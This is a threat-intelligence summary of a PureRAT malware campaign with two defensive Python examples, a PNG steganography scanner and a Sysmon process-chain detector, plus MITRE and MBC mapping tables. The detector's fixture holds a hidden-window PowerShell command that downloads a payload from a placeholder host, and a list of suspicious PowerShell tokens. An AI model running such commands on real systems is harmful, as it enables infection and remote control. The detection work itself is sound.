EXECUTIVE SUMMARY:
A new malware campaign has been discovered, using a remote access trojan (RAT) called PureRAT to compromise Windows systems. The campaign stands out for its ability to hide malicious code inside ordinary-looking PNG image files. This technique, known as fileless execution, reflects a growing shift in how malware is delivered while staying hidden.
The attack begins with a malicious .lnk file, a Windows shortcut that most users trust because it resembles the files used to open regular applications. When a victim opens this shortcut, a concealed PowerShell command launches silently without the user's knowledge. This command contacts a remote server and retrieves a PNG image holding the malicious payload, embedded using steganography. The image looks completely normal, but hidden inside is a Base64-encoded portable executable (PE) file ready to be decoded and loaded into system memory. The multi-stage infection chain uses heavy obfuscation throughout, making it difficult to detect. The malware checks for VMware and QEMU environments to detect virtual analysis sandboxes and terminates immediately if one is found.
PureRAT performs host fingerprinting, gathering details on installed security products, hardware identifiers, and user privileges. It bypasses User Account Control (UAC) via cmstp.exe and uses process hollowing into the legitimate msbuild.exe binary to run malicious code under a trusted Windows process. To mitigate this threat, users should be trained to recognize the risks of opening unexpected .lnk shortcut files or email attachments, even those that appear to come from trusted sources.
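The summary says the PNG carries a Base64-encoded PE, but not where in the file it sits. The scanner below is an added example (not code from the report or from Trellix) that checks the two places a payload can ride along without changing the rendered pixels: plain-text metadata chunks (tEXt) and bytes appended after the IEND chunk. It walks the PNG chunk list, looks for long Base64 runs in those regions, decodes them, and only reports a hit when the decoded bytes carry an MZ stub whose e_lfanew field points at a "PE\0\0" signature, which keeps ordinary Base64 metadata from firing. The fixtures are constructed: a 1x1 PNG and a zero-filled, non-executable stand-in for a PE image.

```python
import base64
import re
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# A run of at least 64 Base64 alphabet characters, optionally padded.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def parse_png(data):
    """Walk the chunk list; return (chunks, offset just past IEND)."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    chunks, pos = [], len(PNG_SIGNATURE)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        chunks.append((ctype, data[pos + 8:pos + 8 + length]))
        pos += 12 + length  # length field + type + payload + CRC
        if ctype == b"IEND":
            break
    return chunks, pos


def looks_like_pe(blob):
    """True if blob starts with the DOS 'MZ' stub and e_lfanew points at 'PE\\0\\0'."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def find_hidden_pe(data):
    """Return [(location, decoded_size)] for Base64 runs that decode to a PE image."""
    chunks, end = parse_png(data)
    # Text metadata chunks and anything after IEND can hold arbitrary bytes
    # without disturbing what an image viewer renders.
    regions = [("tEXt", payload) for ctype, payload in chunks if ctype == b"tEXt"]
    if data[end:]:
        regions.append(("after-IEND", data[end:]))
    findings = []
    for where, blob in regions:
        for match in B64_RUN.finditer(blob):
            try:
                decoded = base64.b64decode(match.group(0), validate=True)
            except ValueError:  # binascii.Error is a ValueError subclass
                continue
            if looks_like_pe(decoded):
                findings.append((where, len(decoded)))
    return findings


# --- constructed fixtures (not real samples) --------------------------------

def _chunk(ctype, payload):
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def build_sample_png(text=None, trailer=b""):
    """Constructed 1x1 greyscale PNG with an optional tEXt chunk and trailer bytes."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # 1x1, 8-bit grey
    png = PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(b"\x00\x00"))
    if text is not None:
        png += _chunk(b"tEXt", b"Comment\x00" + text)
    return png + _chunk(b"IEND", b"") + trailer


def build_fake_pe(size=256):
    """Constructed, non-executable stand-in for a PE: MZ stub, e_lfanew -> 'PE\\0\\0'."""
    image = bytearray(size)
    image[:2] = b"MZ"
    struct.pack_into("<I", image, 0x3C, 0x40)
    image[0x40:0x44] = b"PE\0\0"
    return bytes(image)


def demo():
    """Run the scanner over the constructed fixtures; returns {case: findings}."""
    payload = base64.b64encode(build_fake_pe())
    return {
        "clean": find_hidden_pe(build_sample_png()),
        "after_iend": find_hidden_pe(build_sample_png(trailer=payload)),
        "text_chunk": find_hidden_pe(build_sample_png(text=payload)),
        "base64_but_not_pe": find_hidden_pe(build_sample_png(text=base64.b64encode(b"A" * 100))),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case}: {result}")
```

The scanner deliberately ignores IDAT, so a payload spread across pixel least-significant bits would not be caught by it; that case needs the image decoded and the bit planes examined. It also skips zTXt and compressed iTXt chunks, which would have to be zlib-inflated before the Base64 search.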
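Process hollowing itself leaves no process-creation event, but the launch context around it does: a PowerShell started from the user's shell with a hidden window and a download, cmstp.exe spawned by a script host, and msbuild.exe started by something other than build tooling with no project file on its command line. The detector below is an added example (not code from the report) that applies those three rules over constructed Sysmon-style process-creation records and prints the parent chain for each hit. The paths, PIDs and command lines in SAMPLE_EVENTS are invented for the example; the .inf path and the download URL are placeholders.

```python
import ntpath

SHELLS = {"explorer.exe"}  # where a double-clicked .lnk's child process comes from
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
BUILD_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe"}
PROJECT_EXTS = (".sln", ".csproj", ".vbproj", ".proj", ".targets")
PS_SUSPICIOUS = ("-w hidden", "-windowstyle hidden", "-enc", "-encodedcommand",
                 "downloadfile", "downloadstring", "invoke-webrequest", "iwr ")

# Constructed Sysmon-style process-creation records (EventID 1, reduced to the
# fields the rules need). Not real telemetry; everything here is illustrative.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 10, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 201, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -WindowStyle Hidden -NoProfile -c \"(New-Object Net.WebClient)"
                ".DownloadFile('http://example.invalid/banner.png', 'C:\\Users\\Public\\banner.png')\""},
    {"pid": 202, "ppid": 201, "image": r"C:\Windows\System32\cmstp.exe",
     "cmdline": "cmstp.exe C:\\Users\\Public\\PLACEHOLDER.inf"},
    {"pid": 203, "ppid": 202, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": "MSBuild.exe"},
    # Benign activity that must not fire: an interactive PowerShell and a real build.
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},
    {"pid": 301, "ppid": 10, "image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "cmdline": "devenv.exe"},
    {"pid": 302, "ppid": 301, "image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "cmdline": "MSBuild.exe MyApp.sln /t:Build"},
]


def basename(image):
    return ntpath.basename(image).lower()


def lineage(by_pid, pid):
    """Render the ancestry chain root > ... > pid from the records we have."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return " > ".join(reversed(chain))


def detect_chain(events):
    """Apply the three rules; return [(pid, rule, lineage)] in event order."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        cmd = e["cmdline"].lower()
        rule = None
        if name in {"powershell.exe", "pwsh.exe"} and pname in SHELLS \
                and any(tok in cmd for tok in PS_SUSPICIOUS):
            rule = "hidden/downloading PowerShell launched from the user shell (.lnk stage)"
        elif name == "cmstp.exe" and pname in SCRIPT_HOSTS:
            rule = "cmstp.exe spawned by a script host (UAC bypass stage)"
        elif name == "msbuild.exe" and pname not in BUILD_PARENTS \
                and not any(ext in cmd for ext in PROJECT_EXTS):
            rule = "msbuild.exe started outside build tooling with no project file (hollowing host)"
        if rule:
            hits.append((e["pid"], rule, lineage(by_pid, e["pid"])))
    return hits


if __name__ == "__main__":
    for pid, rule, chain in detect_chain(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}\n    {chain}")
```

These rules describe launch context only. The hollowed msbuild.exe looks like a clean image on disk, so confirming the hollowing means comparing the mapped image in memory with the file on disk (an EDR memory scan or a manual check with a process inspector), and the hits above are best treated as the trigger for that check rather than as a verdict on their own.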
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| --- | --- | --- | --- |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Execution | T1204.002 | User Execution | Malicious File |
| Defence Evasion | T1027 | Obfuscated Files or Information | - |
| Defence Evasion | T1036.005 | Masquerading | Match Legitimate Resource Name or Location |
| Defence Evasion | T1218.011 | System Binary Proxy Execution | Rundll32 |
| Collection | T1005 | Data from Local System | - |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
MBC MAPPING:
| Objective | Behavior ID | Behavior |
| --- | --- | --- |
| Anti-Static Analysis | B0032 | Executable Code Obfuscation |
| Anti-Behavioral Analysis | B0003 | Dynamic Analysis Evasion |
| Execution | E1204 | User Execution |
| Anti-Static Analysis | E1027 | Obfuscated Files or Information |
| Discovery | E1082 | System Information Discovery |
| Persistence | F0012 | Registry Run Keys / Startup Folder |
| Command & Control | B0030 | C2 Communication |
| Defense Evasion | B0029 | Polymorphic Code |
REFERENCES:
The following reports contain further technical details:
https://cybersecuritynews.com/new-purerat-campaign-hides-pe-payloads/
https://www.trellix.com/blogs/research/purerat-fileless-utilizing-steganography-process-hollowing/